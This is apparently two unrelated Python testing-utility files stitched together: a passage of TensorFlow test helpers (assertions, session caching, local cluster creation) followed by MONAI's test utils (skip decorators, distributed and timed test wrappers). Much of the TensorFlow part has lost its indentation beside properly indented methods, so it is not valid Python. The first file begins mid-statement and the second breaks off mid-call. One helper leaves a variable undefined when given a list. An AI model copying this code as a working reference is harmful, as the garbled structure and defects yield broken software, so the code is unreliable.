          "%d of the %d element(s) are outside the range %s. " %
          (len(violation_subscripts[0]), np.size(target), range_str) +
          "Subscript(s) and value(s) of the offending elements:\n" +
          "\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
  # pylint: disable=g-doc-return-or-yield
  @contextlib.contextmanager
  def assertRaisesWithPredicateMatch(self, exception_type,
                                     expected_err_re_or_predicate):
    """Returns a context manager to enclose code expected to raise an exception.

    If the exception is an OpError, the op stack is also included in the message
    predicate search.

    Args:
      exception_type: The expected type of exception that should be raised.
      expected_err_re_or_predicate: If this is callable, it should be a function
        of one argument that inspects the passed-in exception and
        returns True (success) or False (please fail the test). Otherwise, the
        error message is expected to match this regular expression partially.

    Returns:
      A context manager to surround code that is expected to raise an
      exception.
    """
    if callable(expected_err_re_or_predicate):
      predicate = expected_err_re_or_predicate
    else:

      def predicate(e):
        # Build the searchable text: the message plus, for OpErrors, the
        # chain of originating op names.
        err_str = e.message if isinstance(e, errors.OpError) else str(e)
        op = e.op if isinstance(e, errors.OpError) else None
        while op is not None:
          err_str += "\nCaused by: " + op.name
          op = op._original_op  # pylint: disable=protected-access
        logging.info("Searching within error strings: '%s' within '%s'",
                     expected_err_re_or_predicate, err_str)
        return re.search(expected_err_re_or_predicate, err_str)

    try:
      yield
      # Reaching here means the enclosed code did not raise at all.
      self.fail(exception_type.__name__ + " not raised")
    except Exception as e:  # pylint: disable=broad-except
      # Wrong exception type or a non-matching message both count as failure.
      if not isinstance(e, exception_type) or not predicate(e):
        raise AssertionError(
            "Exception of type %s: %s" % (str(type(e)), str(e)))

  # pylint: enable=g-doc-return-or-yield
  def assertRaisesOpError(self, expected_err_re_or_predicate):
    """Like assertRaisesWithPredicateMatch, specialized to `errors.OpError`."""
    return self.assertRaisesWithPredicateMatch(errors.OpError,
                                               expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
  # Fix Python 3 compatibility issues
  # These aliases let test code written against the Python 2 method names
  # keep working when the base TestCase renames them on Python 3.
  if six.PY3:
    # pylint: disable=invalid-name
    # Silence a deprecation warning
    assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
    # assertItemsEqual is assertCountEqual as of 3.2.
    assertItemsEqual = googletest.TestCase.assertCountEqual
    # pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
  def _create_session(self, graph, config, force_gpu):
    """See session() for details."""

    def prepare_config(config):
      """Returns a config for sessions.

      Args:
        config: An optional config_pb2.ConfigProto to use to configure the
          session.

      Returns:
        A config_pb2.ConfigProto object.
      """
      # TODO(b/114333779): Enforce allow_soft_placement=False when
      # use_gpu=False. Currently many tests rely on the fact that any device
      # will be used even when a specific device is supposed to be used.
      allow_soft_placement = not force_gpu
      if config is None:
        config = config_pb2.ConfigProto()
        config.allow_soft_placement = allow_soft_placement
        config.gpu_options.per_process_gpu_memory_fraction = 0.3
      elif not allow_soft_placement and config.allow_soft_placement:
        # Copy before mutating so the caller's config object is untouched.
        config_copy = config_pb2.ConfigProto()
        config_copy.CopyFrom(config)
        config = config_copy
        config.allow_soft_placement = False
      # Don't perform optimizations for tests so we don't inadvertently run
      # gpu ops on cpu
      config.graph_options.optimizer_options.opt_level = -1
      # Disable Grappler constant folding since some tests & benchmarks
      # use constant input and become meaningless after constant folding.
      # DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
      # GRAPPLER TEAM.
      config.graph_options.rewrite_options.constant_folding = (
          rewriter_config_pb2.RewriterConfig.OFF)
      config.graph_options.rewrite_options.pin_to_host_optimization = (
          rewriter_config_pb2.RewriterConfig.OFF)
      return config

    return ErrorLoggingSession(graph=graph, config=prepare_config(config))
  def _get_cached_session(self,
                          graph=None,
                          config=None,
                          force_gpu=False,
                          crash_if_inconsistent_args=True):
    """See cached_session() for documentation."""
    if self._cached_session is None:
      # First use in this test: create the session and remember the
      # arguments so later calls can be checked for consistency.
      sess = self._create_session(
          graph=graph, config=config, force_gpu=force_gpu)
      self._cached_session = sess
      self._cached_graph = graph
      self._cached_config = config
      self._cached_force_gpu = force_gpu
      return sess
    else:
      # Identity (`is`) comparisons are intentional: reusing the cache with
      # even an equal-but-distinct graph/config object is treated as an error.
      if crash_if_inconsistent_args and self._cached_graph is not graph:
        raise ValueError("The graph used to get the cached session is "
                         "different than the one that was used to create the "
                         "session. Maybe create a new session with "
                         "self.session()")
      if crash_if_inconsistent_args and self._cached_config is not config:
        raise ValueError("The config used to get the cached session is "
                         "different than the one that was used to create the "
                         "session. Maybe create a new session with "
                         "self.session()")
      if crash_if_inconsistent_args and (self._cached_force_gpu is
                                         not force_gpu):
        raise ValueError(
            "The force_gpu value used to get the cached session is "
            "different than the one that was used to create the "
            "session. Maybe create a new session with "
            "self.session()")
      return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
  """Returns the `NodeDef` instance for given node name in the graph def.

  This method explores only the NodeDefs in `graph_def.node`.

  Args:
    node_name: Name of the NodeDef to search for.
    graph_def: An instance of `GraphDef` proto.

  Returns:
    the `NodeDef` instance whose name field matches the given node_name or None.
  """
  return next(
      (node_def for node_def in graph_def.node if node_def.name == node_name),
      None)
def set_producer_version(graph, producer_version):
  """Sets graph.graph_def_versions.producer to `producer_version`.

  Args:
    graph: A `tf.Graph` whose producer version is mutated.
    producer_version: The producer version number to install.
  """
  # The C API doesn't expose altering GraphDefVersions. We can indirectly set
  # it via import_graph_def though.
  graph_def = graph_pb2.GraphDef()
  graph_def.versions.producer = producer_version
  with graph.as_default():
    importer.import_graph_def(graph_def)
  # Bug fix: the original wrote `assert x, y`, which treats `y` as the
  # failure message and only checks that `x` is truthy; the intent is an
  # equality check.
  assert graph.graph_def_versions.producer == producer_version
def dismantle_func_graph(func_graph):
  """Removes reference cycles in `func_graph` FuncGraph.

  Helpful for making sure the garbage collector doesn't need to run when
  the FuncGraph goes out of scope, e.g. in tests using defun with
  @test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True).

  Args:
    func_graph: A `FuncGraph` object to destroy. `func_graph` is unusable
      after this function.
  """
  # TODO(b/115366440): Delete this method when a custom OrderedDict is added.
  # Clearing captures using clear() leaves some cycles around.
  captures = func_graph.captures
  while captures:
    captures.popitem()
  memory.dismantle_ordered_dict(captures)
  ops.dismantle_graph(func_graph)
def dismantle_polymorphic_function(func):
  """Removes reference cycles in PolymorphicFunction `func`.

  Helpful for making sure the garbage collector doesn't need to run when
  PolymorphicFunction goes out of scope, e.g. in tests using defun with
  @test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True).

  Args:
    func: A `PolymorphicFunction` object to destroy. `func` is unusable
      after this function.
  """
  # TODO(b/115366440): Delete this method when a custom OrderedDict is added
  cache = func._function_cache  # pylint: disable=protected-access
  # Dismantle every traced concrete function's graph first.
  for concrete in cache.values():
    dismantle_func_graph(concrete.graph)
  while cache:
    cache.popitem()
  memory.dismantle_ordered_dict(cache)
|
utils.py
|
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import datetime
import functools
import importlib
import json
import operator
import os
import queue
import sys
import tempfile
import time
import traceback
import unittest
import warnings
from contextlib import contextmanager
from functools import partial, reduce
from subprocess import PIPE, Popen
from typing import Callable, Optional, Tuple
from urllib.error import ContentTooShortError, HTTPError
import numpy as np
import torch
import torch.distributed as dist
from monai.apps.utils import download_url
from monai.config import NdarrayTensor
from monai.config.deviceconfig import USE_COMPILED
from monai.config.type_definitions import NdarrayOrTensor
from monai.data import create_test_image_2d, create_test_image_3d
from monai.networks import convert_to_torchscript
from monai.utils import optional_import
from monai.utils.module import pytorch_after, version_leq
from monai.utils.type_conversion import convert_data_type
# nibabel is optional; `nib` may be a stub if the package is absent.
nib, _ = optional_import("nibabel")
# Environment variable name that requests the reduced "quick" test mode.
quick_test_var = "QUICKTEST"
# Cached result of is_tf32_env(); None means "not probed yet".
_tf32_enabled = None
# Lazily-populated contents of testing_data/data_config.json (see testing_data_config).
_test_data_config: dict = {}
def testing_data_config(*keys):
"""get _test_data_config[keys0][keys1]...[keysN]"""
if not _test_data_config:
with open(os.path.join(os.path.dirname(__file__), "testing_data", "data_config.json")) as c:
_config = json.load(c)
for k, v in _config.items():
_test_data_config[k] = v
return reduce(operator.getitem, keys, _test_data_config)
def clone(data: NdarrayTensor) -> NdarrayTensor:
    """
    Return a deep copy of ``data``, independent of its concrete type.

    Args:
        data (NdarrayTensor): a PyTorch Tensor or numpy array.

    Returns:
        Any: the cloned data object.
    """
    cloned = copy.deepcopy(data)
    return cloned
def assert_allclose(
    actual: NdarrayOrTensor,
    desired: NdarrayOrTensor,
    type_test: bool = True,
    device_test: bool = False,
    *args,
    **kwargs,
):
    """
    Assert that the types and all values of two data objects are close.

    Args:
        actual: Pytorch Tensor or numpy array for comparison.
        desired: Pytorch Tensor or numpy array to compare against.
        type_test: whether to test that `actual` and `desired` are both numpy arrays or torch tensors.
        device_test: whether to test the device property.
        args: extra arguments to pass on to `np.testing.assert_allclose`.
        kwargs: extra arguments to pass on to `np.testing.assert_allclose`.
    """
    if type_test:
        # both sides must agree on being numpy / being torch
        np.testing.assert_equal(isinstance(actual, np.ndarray), isinstance(desired, np.ndarray), "numpy type")
        np.testing.assert_equal(isinstance(actual, torch.Tensor), isinstance(desired, torch.Tensor), "torch type")
    if isinstance(actual, torch.Tensor) or isinstance(desired, torch.Tensor):
        if device_test:
            np.testing.assert_equal(str(actual.device), str(desired.device), "torch device check")  # type: ignore
        # move any tensor operand to host numpy before the numeric comparison
        if isinstance(actual, torch.Tensor):
            actual = actual.cpu().numpy()
        if isinstance(desired, torch.Tensor):
            desired = desired.cpu().numpy()
    np.testing.assert_allclose(actual, desired, *args, **kwargs)
@contextmanager
def skip_if_downloading_fails():
    """Context manager that converts known download failures into ``unittest.SkipTest``."""
    try:
        yield
    except (ContentTooShortError, HTTPError, ConnectionError) as e:
        raise unittest.SkipTest(f"error while downloading: {e}") from e
    except RuntimeError as rt_e:
        # incomplete download, transient network problems, missing gdown, or checksum mismatch
        known_issues = ("unexpected EOF", "network issue", "gdown dependency", "md5 check")
        if any(issue in str(rt_e) for issue in known_issues):
            raise unittest.SkipTest(f"error while downloading: {rt_e}") from rt_e
        raise rt_e
def test_pretrained_networks(network, input_param, device):
with skip_if_downloading_fails():
return network(**input_param).to(device)
def test_is_quick():
return os.environ.get(quick_test_var, "").lower() == "true"
def is_tf32_env():
    """
    The environment variable NVIDIA_TF32_OVERRIDE=0 will override any defaults
    or programmatic configuration of NVIDIA libraries, and consequently,
    cuBLAS will not accelerate FP32 computations with TF32 tensor cores.
    """
    global _tf32_enabled
    # Probe once per process and cache the result in the module-level flag.
    if _tf32_enabled is None:
        _tf32_enabled = False
        if (
            torch.cuda.is_available()
            and not version_leq(f"{torch.version.cuda}", "10.100")  # i.e. CUDA at least 11.0
            and os.environ.get("NVIDIA_TF32_OVERRIDE", "1") != "0"
            and torch.cuda.device_count() > 0
        ):
            try:
                # with TF32 enabled, the speed is ~8x faster, but the precision has ~2 digits less in the result
                g_gpu = torch.Generator(device="cuda")
                g_gpu.manual_seed(2147483647)
                a_full = torch.randn(1024, 1024, dtype=torch.double, device="cuda", generator=g_gpu)
                b_full = torch.randn(1024, 1024, dtype=torch.double, device="cuda", generator=g_gpu)
                # If the float32 matmul deviates from the double-precision one by more
                # than the tolerance, TF32 tensor cores are active (observed ~0.1713).
                _tf32_enabled = (a_full.float() @ b_full.float() - a_full @ b_full).abs().max().item() > 0.001  # 0.1713
            except BaseException:
                # any CUDA failure here means we simply report TF32 as disabled
                pass
        print(f"tf32 enabled: {_tf32_enabled}")
    return _tf32_enabled
def skip_if_quick(obj):
    """
    Skip the unit tests if environment variable `quick_test_var=true`.
    For example, the user can skip the relevant tests by setting ``export QUICKTEST=true``.
    """
    return unittest.skipIf(test_is_quick(), "Skipping slow tests")(obj)
class SkipIfNoModule:
    """Decorator that skips a test when an optional module cannot be imported."""

    def __init__(self, module_name):
        self.module_name = module_name
        _, has_module = optional_import(module_name)
        self.module_missing = not has_module

    def __call__(self, obj):
        return unittest.skipIf(self.module_missing, f"optional module not present: {self.module_name}")(obj)
class SkipIfModule:
    """Decorator that skips a test when an optional module IS importable."""

    def __init__(self, module_name):
        self.module_name = module_name
        _, has_module = optional_import(module_name)
        self.module_avail = has_module

    def __call__(self, obj):
        return unittest.skipIf(self.module_avail, f"Skipping because optional module present: {self.module_name}")(obj)
def skip_if_no_cpp_extension(obj):
    """
    Skip the unit tests when the compiled cpp extension is unavailable.
    """
    has_ext = USE_COMPILED
    return unittest.skipUnless(has_ext, "Skipping cpp extension tests")(obj)
def skip_if_no_cuda(obj):
    """
    Skip the unit tests when torch.cuda.is_available() is False.
    """
    has_cuda = torch.cuda.is_available()
    return unittest.skipUnless(has_cuda, "Skipping CUDA-based tests")(obj)
def skip_if_windows(obj):
    """
    Skip the unit tests when running on win32.
    """
    on_windows = sys.platform == "win32"
    return unittest.skipIf(on_windows, "Skipping tests on Windows")(obj)
class SkipIfBeforePyTorchVersion:
    """Decorator that skips a test on PyTorch versions older than the given tuple."""

    def __init__(self, pytorch_version_tuple):
        self.min_version = pytorch_version_tuple
        self.version_too_old = not pytorch_after(*pytorch_version_tuple)

    def __call__(self, obj):
        reason = f"Skipping tests that fail on PyTorch versions before: {self.min_version}"
        return unittest.skipIf(self.version_too_old, reason)(obj)
class SkipIfAtLeastPyTorchVersion:
    """Decorator that skips a test on PyTorch versions newer than or equal to the given tuple."""

    def __init__(self, pytorch_version_tuple):
        self.max_version = pytorch_version_tuple
        self.version_too_new = pytorch_after(*pytorch_version_tuple)

    def __call__(self, obj):
        reason = f"Skipping tests that fail on PyTorch versions at least: {self.max_version}"
        return unittest.skipIf(self.version_too_new, reason)(obj)
def has_cupy():
    """
    Return True when a functional cupy installation is present.
    """
    cp, has_cp = optional_import("cupy")
    if not has_cp:
        return False
    # verify the installation with a tiny element-wise kernel rather than trusting the import
    try:
        xs = cp.arange(6, dtype="f").reshape(2, 3)
        ys = cp.arange(3, dtype="f")
        kernel = cp.ElementwiseKernel(
            "float32 x, float32 y", "float32 z", """ if (x - 2 > y) { z = x * y; } else { z = x + y; } """, "my_kernel"
        )
        return kernel(xs, ys)[0, 0] == 0
    except Exception:
        return False


HAS_CUPY = has_cupy()
def make_nifti_image(array: NdarrayOrTensor, affine=None, dir=None, fname=None, suffix=".nii.gz", verbose=False):
    """
    Create a temporary nifti image on the disk and return the image name.
    User is responsible for deleting the temporary file when done with it.
    """
    # normalise tensors to numpy so nibabel can consume them
    if isinstance(array, torch.Tensor):
        array, *_ = convert_data_type(array, np.ndarray)
    if isinstance(affine, torch.Tensor):
        affine, *_ = convert_data_type(affine, np.ndarray)
    if affine is None:
        affine = np.eye(4)
    test_image = nib.Nifti1Image(array, affine)

    # choose the output directory: random temp dir when unspecified, otherwise ensure it exists
    if dir is None:
        dir = tempfile.mkdtemp()
    else:
        os.makedirs(dir, exist_ok=True)

    # choose the output file name: random temp name when unspecified, otherwise dir/fname+suffix
    if fname is None:
        temp_f, fname = tempfile.mkstemp(suffix=suffix, dir=dir)
        os.close(temp_f)  # mkstemp opens the file; only the path is needed
    else:
        fname = os.path.join(dir, fname + suffix)

    nib.save(test_image, fname)
    if verbose:
        print(f"File written: {fname}.")
    return fname
def make_rand_affine(ndim: int = 3, random_state: Optional[np.random.RandomState] = None):
    """Create a random affine matrix whose entries are all -1, 0 or 1 (signed permutation plus homogeneous row)."""
    if random_state is None:
        rs = np.random.random.__self__  # the global RandomState behind np.random  # type: ignore
    else:
        rs = random_state
    signs = rs.choice([-1, 1], size=ndim)
    cols = rs.choice(range(ndim), size=ndim, replace=False)
    affine = np.zeros([ndim + 1, ndim + 1])
    affine[ndim, ndim] = 1  # homogeneous-coordinate row
    for row, (sign, col) in enumerate(zip(signs, cols)):
        affine[row, col] = sign
    return affine
class DistTestCase(unittest.TestCase):
    """
    A TestCase that drops the unpicklable ``_outcome`` attribute from its state,
    so instances can be sent across process boundaries.
    """

    def __getstate__(self):
        state = dict(self.__dict__)
        state.pop("_outcome")
        return state

    def __setstate__(self, data_dict):
        self.__dict__.update(data_dict)
class DistCall:
    """
    Wrap a test case so that it will run in multiple processes on a single machine using `torch.distributed`.

    It is designed to be used with `tests.utils.DistTestCase`.

    Usage:

        decorate a unittest testcase method with a `DistCall` instance::

            class MyTests(unittest.TestCase):
                @DistCall(nnodes=1, nproc_per_node=3, master_addr="localhost")
                def test_compute(self):
                    ...

        the `test_compute` method should trigger different worker logic according to `dist.get_rank()`.

    Multi-node tests require a fixed master_addr:master_port, with node_rank set manually in multiple scripts
    or from environment variable "NODE_RANK".
    """

    def __init__(
        self,
        nnodes: int = 1,
        nproc_per_node: int = 1,
        master_addr: str = "localhost",
        master_port: Optional[int] = None,
        node_rank: Optional[int] = None,
        timeout=60,
        init_method=None,
        backend: Optional[str] = None,
        daemon: Optional[bool] = None,
        method: Optional[str] = "spawn",
        verbose: bool = False,
    ):
        """
        Args:
            nnodes: The number of nodes to use for distributed call.
            nproc_per_node: The number of processes to call on each node.
            master_addr: Master node (rank 0)'s address, should be either the IP address or the hostname of node 0.
            master_port: Master node (rank 0)'s free port.
            node_rank: The rank of the node, this could be set via environment variable "NODE_RANK".
            timeout: Timeout for operations executed against the process group.
            init_method: URL specifying how to initialize the process group.
                Default is "env://" or "file:///d:/a_temp" (windows) if unspecified.
            backend: The backend to use. Depending on build-time configurations,
                valid values include ``mpi``, ``gloo``, and ``nccl``.
            daemon: the process's daemon flag.
                When daemon=None, the initial value is inherited from the creating process.
            method: set the method which should be used to start a child process.
                method can be 'fork', 'spawn' or 'forkserver'.
            verbose: whether to print NCCL debug info.

        Raises:
            ValueError: when ``nnodes`` or ``nproc_per_node`` is smaller than 1.
        """
        self.nnodes = int(nnodes)
        self.nproc_per_node = int(nproc_per_node)
        if self.nnodes < 1 or self.nproc_per_node < 1:
            raise ValueError(
                f"number of nodes and processes per node must be >= 1, got {self.nnodes} and {self.nproc_per_node}"
            )
        self.node_rank = int(os.environ.get("NODE_RANK", "0")) if node_rank is None else int(node_rank)
        self.master_addr = master_addr
        # pick a random high port when none is given so parallel test runs don't collide
        self.master_port = np.random.randint(10000, 20000) if master_port is None else master_port
        if backend is None:
            self.backend = "nccl" if torch.distributed.is_nccl_available() and torch.cuda.is_available() else "gloo"
        else:
            self.backend = backend
        self.init_method = init_method
        if self.init_method is None and sys.platform == "win32":
            # windows does not support the default "env://" rendezvous
            self.init_method = "file:///d:/a_temp"
        self.timeout = datetime.timedelta(0, timeout)
        self.daemon = daemon
        self.method = method
        self.verbose = verbose

    def run_process(self, func, local_rank, args, kwargs, results):
        """Worker entry point: configure the distributed env vars, run ``func``, report success via ``results``."""
        _env = os.environ.copy()  # keep the original system env so it can be restored afterwards
        try:
            os.environ["MASTER_ADDR"] = self.master_addr
            os.environ["MASTER_PORT"] = str(self.master_port)
            os.environ["LOCAL_RANK"] = str(local_rank)
            if self.verbose:
                os.environ["NCCL_DEBUG"] = "INFO"
                os.environ["NCCL_DEBUG_SUBSYS"] = "ALL"
            os.environ["NCCL_BLOCKING_WAIT"] = str(1)
            os.environ["OMP_NUM_THREADS"] = str(1)
            os.environ["WORLD_SIZE"] = str(self.nproc_per_node * self.nnodes)
            os.environ["RANK"] = str(self.nproc_per_node * self.node_rank + local_rank)

            if torch.cuda.is_available():
                torch.cuda.set_device(int(local_rank))  # using device ids from CUDA_VISIBILE_DEVICES

            dist.init_process_group(
                backend=self.backend,
                init_method=self.init_method,
                timeout=self.timeout,
                world_size=int(os.environ["WORLD_SIZE"]),
                rank=int(os.environ["RANK"]),
            )
            func(*args, **kwargs)
            # the primary node lives longer to
            # avoid _store_based_barrier, RuntimeError: Broken pipe
            # as the TCP store daemon is on the rank 0
            if int(os.environ["RANK"]) == 0:
                time.sleep(0.1)
            results.put(True)
        except Exception as e:
            results.put(False)
            raise e
        finally:
            # restore the caller's environment and tear down the process group
            os.environ.clear()
            os.environ.update(_env)
            try:
                dist.destroy_process_group()
            except RuntimeError as e:
                warnings.warn(f"While closing process group: {e}.")

    def __call__(self, obj):
        """Decorate ``obj`` so it runs once per requested process; skip when the environment can't support it."""
        if not torch.distributed.is_available():
            return unittest.skipIf(True, "Skipping distributed tests because not torch.distributed.is_available()")(obj)
        # BUGFIX: the guard compares against nproc_per_node, so the skip message must report that
        # value (previously it incorrectly reported self.nnodes).
        if torch.cuda.is_available() and torch.cuda.device_count() < self.nproc_per_node:
            return unittest.skipIf(
                True,
                f"Skipping distributed tests because it requires {self.nproc_per_node} devices "
                f"but got {torch.cuda.device_count()}",
            )(obj)
        _cache_original_func(obj)

        @functools.wraps(obj)
        def _wrapper(*args, **kwargs):
            tmp = torch.multiprocessing.get_context(self.method)
            processes = []
            results = tmp.Queue()
            func = _call_original_func
            args = [obj.__name__, obj.__module__] + list(args)
            for proc_rank in range(self.nproc_per_node):
                p = tmp.Process(
                    target=self.run_process, args=(func, proc_rank, args, kwargs, results), daemon=self.daemon
                )
                p.start()
                processes.append(p)
            for p in processes:
                p.join()
            assert results.get(), "Distributed call failed."
            _del_original_func(obj)

        return _wrapper
class TimedCall:
    """
    Wrap a test case so that it will run in a new process, raises a TimeoutError if the decorated method takes
    more than `seconds` to finish. It is designed to be used with `tests.utils.DistTestCase`.
    """

    def __init__(
        self,
        seconds: float = 60.0,
        daemon: Optional[bool] = None,
        method: Optional[str] = "spawn",
        force_quit: bool = True,
        skip_timing=False,
    ):
        """
        Args:
            seconds: timeout seconds.
            daemon: the process's daemon flag.
                When daemon=None, the initial value is inherited from the creating process.
            method: set the method which should be used to start a child process.
                method can be 'fork', 'spawn' or 'forkserver'.
            force_quit: whether to terminate the child process when `seconds` elapsed.
            skip_timing: whether to skip the timing constraint.
                this is useful to include some system conditions such as
                `torch.cuda.is_available()`.
        """
        self.timeout_seconds = seconds
        self.daemon = daemon
        self.force_quit = force_quit
        self.skip_timing = skip_timing
        self.method = method

    @staticmethod
    def run_process(func, args, kwargs, results):
        # Child-process entry point: forward either the result or the exception
        # (with its formatted traceback attached) back through the queue.
        try:
            output = func(*args, **kwargs)
            results.put(output)
        except Exception as e:
            e.traceback = traceback.format_exc()
            results.put(e)

    def __call__(self, obj):
        if self.skip_timing:
            # run the test in-process with no deadline
            return obj
        _cache_original_func(obj)

        @functools.wraps(obj)
        def _wrapper(*args, **kwargs):
            tmp = torch.multiprocessing.get_context(self.method)
            func = _call_original_func
            # the child looks the function up by (name, module) to stay picklable
            args = [obj.__name__, obj.__module__] + list(args)
            results = tmp.Queue()
            p = tmp.Process(target=TimedCall.run_process, args=(func, args, kwargs, results), daemon=self.daemon)
            p.start()
            p.join(timeout=self.timeout_seconds)
            timeout_error = None
            try:
                if p.is_alive():
                    # create an Exception
                    timeout_error = torch.multiprocessing.TimeoutError(
                        f"'{obj.__name__}' in '{obj.__module__}' did not finish in {self.timeout_seconds}s."
                    )
                    if self.force_quit:
                        p.terminate()
                    else:
                        warnings.warn(
                            f"TimedCall: deadline ({self.timeout_seconds}s) "
                            f"reached but waiting for {obj.__name__} to finish."
                        )
            finally:
                p.join()
                _del_original_func(obj)
            res = None
            try:
                res = results.get(block=False)
            except queue.Empty:  # no result returned, took too long
                pass
            if isinstance(res, Exception):  # other errors from obj
                if hasattr(res, "traceback"):
                    raise RuntimeError(res.traceback) from res
                raise res
            if timeout_error:  # no force_quit finished
                raise timeout_error
            return res

        return _wrapper
# name -> original (undecorated) callable, so decorators don't shadow the function
_original_funcs = {}


def _cache_original_func(obj) -> None:
    """Remember the original function by name, so a decorator doesn't shadow it."""
    _original_funcs[obj.__name__] = obj


def _del_original_func(obj):
    """Drop the cached original function (if any) and release cached CUDA memory."""
    _original_funcs.pop(obj.__name__, None)
    if torch.cuda.is_available():  # clean up the cached function
        torch.cuda.synchronize()
        torch.cuda.empty_cache()


def _call_original_func(name, module, *args, **kwargs):
    """Look up the cached original function ``name`` (reimporting ``module`` to refresh the cache if needed) and call it."""
    if name not in _original_funcs:
        _original_module = importlib.import_module(module)  # reimport, refresh _original_funcs
        if not hasattr(_original_module, name):
            # refresh module doesn't work
            raise RuntimeError(f"Could not recover the original {name} from {module}: {_original_funcs}.")
    return _original_funcs[name](*args, **kwargs)
class NumpyImageTestCase2D(unittest.TestCase):
    """Base test case providing a synthetic 2D image, binary mask and multi-class mask as numpy arrays."""

    im_shape = (128, 64)
    input_channels = 1
    output_channels = 4
    num_classes = 3

    def setUp(self):
        width, height = self.im_shape
        im, msk = create_test_image_2d(
            width, height, num_objs=4, rad_max=20, noise_max=0.0, num_seg_classes=self.num_classes
        )
        # add (batch, channel) leading dims
        self.imt = im[None, None]
        self.seg1 = (msk[None, None] > 0).astype(np.float32)
        self.segn = msk[None, None]
class TorchImageTestCase2D(NumpyImageTestCase2D):
    """Same fixtures as :class:`NumpyImageTestCase2D`, converted to torch tensors."""

    def setUp(self):
        super().setUp()
        self.imt = torch.tensor(self.imt)
        self.seg1 = torch.tensor(self.seg1)
        self.segn = torch.tensor(self.segn)
class NumpyImageTestCase3D(unittest.TestCase):
    """Base test case providing a synthetic 3D image, binary mask and multi-class mask as numpy arrays."""

    im_shape = (64, 48, 80)
    input_channels = 1
    output_channels = 4
    num_classes = 3

    def setUp(self):
        d0, d1, d2 = self.im_shape
        im, msk = create_test_image_3d(
            d0,
            d1,
            d2,
            num_objs=4,
            rad_max=20,
            noise_max=0.0,
